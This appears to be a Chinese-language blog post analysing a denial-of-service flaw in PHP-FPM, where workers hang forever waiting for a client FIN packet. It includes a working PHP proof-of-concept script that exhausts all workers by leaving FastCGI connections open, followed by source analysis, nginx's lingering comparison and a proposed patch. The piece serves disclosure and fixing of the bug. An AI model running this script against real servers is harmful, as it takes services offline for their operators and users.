1   问题

给你一个php server的ip&&port,如何使它不可服务?

PS1:: 这个攻击问题实际上是没有意义的,因为php一般是不对外开放的,只是讨论而已

PS2:: 不过在实际环境中,如果持续性的fin包丢失,的确也是会产生服务不可用的问题(至少我们线上已经出现过每天丢一部分的fin包了-_-||)

PS3:: php因为fin包丢失而永久hang住的问题是存在的,只是fin包是如何丢失的,又是另外一个问题了

2   做法

2.1   思路

利用现有php源码的缺陷

php-cgi worker里的fd都是堵塞的,同时不设置读写超时,而且还在代码里写了一个死循环接受最后的fin包

于是可以根据fast-cgi协议,构造一个请求,最后不关闭socket,这样就可以使php-cgi 的一个worker hang住

持续性这样的请求,使所有的worker都hang住,这样server就不可用了

2.2   demo-code

<?php
require_once "./lib/fastcgipro.php";

define('FCGI_HOST', '127.0.0.1');
define('FCGI_PORT', 19550);

make_hang_main();

function make_hang_main()
{
    for($cnt = 1; ;++$cnt)
    {
        $socket[$cnt] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        socket_connect($socket[$cnt], FCGI_HOST, FCGI_PORT);

        $content_body = '';
        $fcgi_request_id = $cnt;
        $env = array(
            'SCRIPT_FILENAME' => '/home/file_not_exist.php',
            'REQUEST_METHOD'  => 'GET',
            'CONTENT_LENGTH' => strlen($content_body),
        );

        send_request($socket[$cnt], $content_body, $env, $fcgi_request_id);
        $result = get_response($socket[$cnt]);
        echo "***************$cnt*****************\n";
        var_dump($result);
        //socket_close($socket[$cnt]);//we don't send FIN to server
    }

    //can't run here
    for($i = 1; $i <= $cnt; ++$i)
    {
        socket_close($socket[$i]);
    }
}

2.3   测试结果

在fpm里设置max_children为10,那么发完10个请求后,第11个请求就会一直hang在那里,整个server处于无法服务的状态

随便gbd一个worker的进程,可以看到hang在接受网络数据的地方:

(gdb) bt
#0  0x0000003f0b90b4e4 in recv () from /lib64/tls/libpthread.so.0
#1  0x000000000098ed78 in fcgi_close (req=0x7fffa8c58ad0, force=0, destroy=1) at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fastcgi.c:763
#2  0x000000000098f82d in fcgi_finish_request (req=0x7fffa8c58ad0, force_close=0) at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fastcgi.c:1081
#3  0x0000000000999f55 in sapi_cgi_deactivate () at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fpm_main.c:847
#4  0x0000000000871a9b in sapi_deactivate () at /home/users/lihongbin/git/php-src/main/SAPI.c:536
#5  0x0000000000866580 in php_request_shutdown (dummy=0x0) at /home/users/lihongbin/git/php-src/main/main.c:1817
#6  0x000000000099c317 in main (argc=7, argv=0x7fffa8c5acb8) at /home/users/lihongbin/git/php-src/sapi/fpm/fpm/fpm_main.c:1981

2.4   网络交互流程图

TCP四次分手流程图:

client                       php-cgi
    |                            |
    |       FIN                  |shutdown(req->fd, 1)
    | <------------------------- |       ||
    |       ACK                  |       ||
    | -------------------------> |       \/
    |      FIN                   |while(recv(req->fd), buf, sizeof(buf), 0) > 0) => wait FIN
    | -------------------------> |
    |      ACK                   |
    | <------------------------- |
    |                            |
    |                            |

2.5   refer code

//sapi/fpm/fpm/fastcgi.c
void fcgi_close(fcgi_request *req, int force, int destroy)
{
    //................

    if ((force || !req->keep) && req->fd >= 0) {
#ifdef _WIN32
    //.................
            shutdown(req->fd, 1);
            while (recv(req->fd, buf, sizeof(buf), 0) > 0) {}//hang here if client don't send the pack of fin
    //................
#else
        if (!force) {//fcgi_finish_request -> fcgi_close的时候,参数force写死了为0,必然走到这里
            char buf[8];

            shutdown(req->fd, 1);
            while (recv(req->fd, buf, sizeof(buf), 0) > 0) {}//hang here if client don't send the pack of fin
        }
        close(req->fd);
#endif
        req->fd = -1;
        fpm_request_finished();
    }
}

3   request_terminate_timeout能解决问题?

在fpm的配置里有一个request_terminate_timeout配置项,从外围来监控进程的运行时间,这个选项能解决问题?

很遗憾,在目前的代码里是没有办法的,具体来看代码

先来看worker的处理流程代码

//sapi/fpm/fpm/fpm_main.c
int main(int argc, char *argv[])
{
    //..............
    fcgi_fd = fpm_run(&max_requests);//如果是fpm的mater进程,则一直在fpm_run里监控各种事件,下面的代码是worker运行的
    //.................
    zend_first_try {
        while (fcgi_accept_request(&request) >= 0) {
            //................

            fpm_request_info();

            //...........

            fpm_request_executing();

            php_execute_script(&file_handle TSRMLS_CC);

            //............
            fpm_request_end(TSRMLS_C);//将request_stage 设置为 FPM_REQUEST_FINISHED
            fpm_log_write(NULL TSRMLS_CC);

            STR_FREE(SG(request_info).path_translated);
            SG(request_info).path_translated = NULL;

            php_request_shutdown((void *) 0);//php_request_shutdown -> sapi_deactivate -> sapi_cgi_deactivate -> fcgi_finish_request -> fcgi_close
                                             //在上面贴的fcgi_close函数里接收client最后的数据

            requests++;
            if (max_requests && (requests == max_requests)) {
                fcgi_finish_request(&request, 1);
                break;
            }
            /* end of fastcgi loop */
        }
        //..................
    } zend_catch {
        exit_status = FPM_EXIT_SOFTWARE;
    } zend_end_try();
}

再看fpm控制worker进程的处理代码

fpm的master进程有一个心跳监控机制,隔某个时间点(最多1秒)看一下每个worker是否超过执行时间了,如果超过,则kill该worker,重新生成一个worker接收请求

PS:后续再搞一个文章介绍一下fpm的运行机制

fpm基本的流程:

main -> fpm_run -> fpm_event_loop -> fpm_pctl_heartbeat -> fpm_pctl_check_request_timeout -> fpm_request_check_timed_out

来详细看看fpm_request_check_timed_out函数

//sapi/fpm/fpm/fpm_request.c
void fpm_request_check_timed_out(struct fpm_child_s *child, struct timeval *now, int terminate_timeout, int slowlog_timeout) /* {{{ */
{
    struct fpm_scoreboard_proc_s proc, *proc_p;

    proc_p = fpm_scoreboard_proc_acquire(child->wp->scoreboard, child->scoreboard_i, 1);
    if (!proc_p) {
        zlog(ZLOG_WARNING, "failed to acquire scoreboard");
        return;
    }

    proc = *proc_p;
    fpm_scoreboard_proc_release(proc_p);

    //.........................

    if (proc.request_stage > FPM_REQUEST_ACCEPTING && proc.request_stage < FPM_REQUEST_END) { //注意这里 ~~~~~~~~~~~~~~~~~~~~~~~~~~
    //之前已经将 request_stage 设置为 FPM_REQUEST_FINISHED, 而 FPM_REQUEST_FINISHED 大于 FPM_REQUEST_END
    //所以在fcgi_close里读client端无用数据的时候,是没有办法走到下面的分支里的,也就无法kill掉执行超时的worker,这个worker会一直hang在那里

        char purified_script_filename[sizeof(proc.script_filename)];
        struct timeval tv;

        timersub(now, &proc.accepted, &tv);

        //.................
        // slow log
        if (terminate_timeout && tv.tv_sec >= terminate_timeout) {
            str_purify_filename(purified_script_filename, proc.script_filename, sizeof(proc.script_filename));
            fpm_pctl_kill(child->pid, FPM_PCTL_TERM);

            zlog(ZLOG_WARNING, "[pool %s] child %d, script '%s' (request: \"%s %s\") execution timed out (%d.%06d sec), terminating",
                child->wp->config->name, (int) child->pid, purified_script_filename, proc.request_method, proc.request_uri,
                (int) tv.tv_sec, (int) tv.tv_usec);
        }
    }
}

4   nginx的解决办法

其实nginx也会遇到这种情况,在我们线上已经发生过了,不过ningx处理的不错

nginx 有lingering机制解决这种case,具体有三个相关参数

4.1   lingering_close

lingering_close 表示当server 关闭socket的写时候,是否需要继续从client端来接收额外的数据

4.2   lingering_time

lingering_time 表示当lingering_close生效的时候,即继续接受数据的时候,接受数据的超时时间

4.3   lingering_timeout

在lingering_timeout内必须有数据,否则停止接收数据,一种idle time超时机制

4.4   refer code

static void ngx_http_set_lingering_close(ngx_http_request_t *r)
{
    ngx_event_t               *rev, *wev;
    ngx_connection_t          *c;
    ngx_http_core_loc_conf_t  *clcf;

    c = r->connection;

    clcf = ngx_http_get_module_loc_conf(r, ngx_http_core_module);

    rev = c->read;
    rev->handler = ngx_http_lingering_close_handler;//set lingering_timeout handler

    r->lingering_time = ngx_time() + (time_t) (clcf->lingering_time / 1000);//set lingering_time
    ngx_add_timer(rev, clcf->lingering_timeout);//set lingering_timeout timer

    if (ngx_handle_read_event(rev, 0) != NGX_OK) {
        ngx_http_close_request(r, 0);
        return;
    }

    wev = c->write;
    wev->handler = ngx_http_empty_handler;

    if (wev->active && (ngx_event_flags & NGX_USE_LEVEL_EVENT)) {
        if (ngx_del_event(wev, NGX_WRITE_EVENT, 0) != NGX_OK) {
            ngx_http_close_request(r, 0);
            return;
        }
    }

    if (ngx_shutdown_socket(c->fd, NGX_WRITE_SHUTDOWN) == -1) {
        ngx_connection_error(c, ngx_socket_errno,
                             ngx_shutdown_socket_n " failed");
        ngx_http_close_request(r, 0);
        return;
    }

    if (rev->ready) {
        ngx_http_lingering_close_handler(rev);
    }
}

5   php的解决办法

5.1   思路

学习nginx的lingering机制,在php.ini里增加两个参数来约束接受最后clinet的无用数据

  • lingering_time_s:接受无用数据的最长时间,单位是秒
  • lingering_timeout_ms:idle timeout机制,在lingering_timeout_ms时间内都没有收到数据的话,就关闭socket,停止接收数据,单位是毫秒

5.2   refer core code

char buf[8];
time_t start, end;
int sec;

shutdown(req->fd, 1);
if (PG(lingering_timeout_ms) > 0) {
    struct timeval ltimeout = {PG(lingering_timeout_ms)/1000, 1000 * (PG(lingering_timeout_ms) % 1000)};
    setsockopt(req->fd, SOL_SOCKET, SO_RCVTIMEO, (const char*)&ltimeout, sizeof(ltimeout));
} else if (PG(lingering_time_s) > 0) {
    struct timeval ltimeout = {PG(lingering_time_s), 0};
    setsockopt(req->fd, SOL_SOCKET, SO_RCVTIMEO, (const char*)&ltimeout, sizeof(ltimeout));
}

time(&start);
while (recv(req->fd, buf, sizeof(buf), 0) > 0) {
     if (PG(lingering_time_s) > 0) {
         time(&end);
         sec = (int)(end-start);
         if (sec > PG(lingering_time_s)) {
             break;
         }
     }
 }

5.3   github上的PR

https://github.com/php/php-src/pull/966